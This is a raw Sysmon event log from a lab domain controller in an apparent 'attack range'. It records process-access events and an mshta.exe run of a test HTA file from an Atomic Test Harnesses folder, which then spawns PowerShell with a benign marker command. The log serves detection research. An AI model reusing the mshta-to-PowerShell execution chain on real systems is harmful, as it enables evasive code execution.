10341000x800000000000000028690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.599{7901BC46-538F-6008-8D06-00000000A301}61644396C:\Windows\System32\mshta.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.604{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 51ec02cd-8d80-45b5-9694-0e191323d056; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000028686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.552{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.552{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.552{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.552{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.552{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.536{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.536{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.521{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000028672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.524{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000028671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:15.505{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet 